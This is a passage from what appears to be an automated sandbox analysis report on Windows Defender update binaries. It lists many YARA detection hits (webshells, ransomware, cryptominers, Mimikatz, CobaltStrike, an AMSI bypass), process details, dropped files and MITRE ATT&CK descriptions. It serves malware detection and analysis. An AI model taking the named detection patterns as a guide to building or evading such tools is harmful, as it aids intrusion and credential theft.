00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18319503784.00000138BE66C000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18300587499.00000138BE28E000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18291761539.00000138BCE4E000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18314653568.00000138BCAC3000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, Author: Joe Security Rule: Trojan_Win32_PlaKeylog_B, Description: Keylogger component, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Microsoft Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, Author: Joe Security Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cute, Description: Yara detected Cute Ransomware, Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18317087585.00000138BCA04000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18320434515.00000138BD905000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Growtopia, Description: Yara detected Growtopia, Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306077924.00000138BCEEA000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_Samples, Description: Hacktool, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: unknown Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18432672691.00000138BDF33000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18349361933.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 3364 Parent PID: 3196

General

Start time:	04:45:52
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man
Imagebase:	0x7ff7e0630000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 5324 Parent PID: 3364

General

Start time:	04:45:53
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 4860 Parent PID: 3196

General

Start time:	04:45:54
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Imagebase:	0x7ff7e0630000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 6548 Parent PID: 4860

General

Start time:	04:45:54
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mpam-77b29277.exe PID: 6444 Parent PID: 3224

General

Start time:	04:46:03
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Imagebase:	0x7ff6a36d0000
File size:	7855240 bytes
MD5 hash:	34B7B3BDFA61E18D3B2C3B0AC92B78EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: MpSigStub.exe PID: 4520 Parent PID: 6444

General

Start time:	04:46:08
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Imagebase:	0x7ff7b57c0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetours.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCmdRun.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUpdate.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSvc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpEng.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetoursCopyAccelerator.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUxAgent.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpRtp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCopyAccelerator.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\NisSrv.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\endpointdlp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mpextms.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\endpointdlp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	Jump to dropped file

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

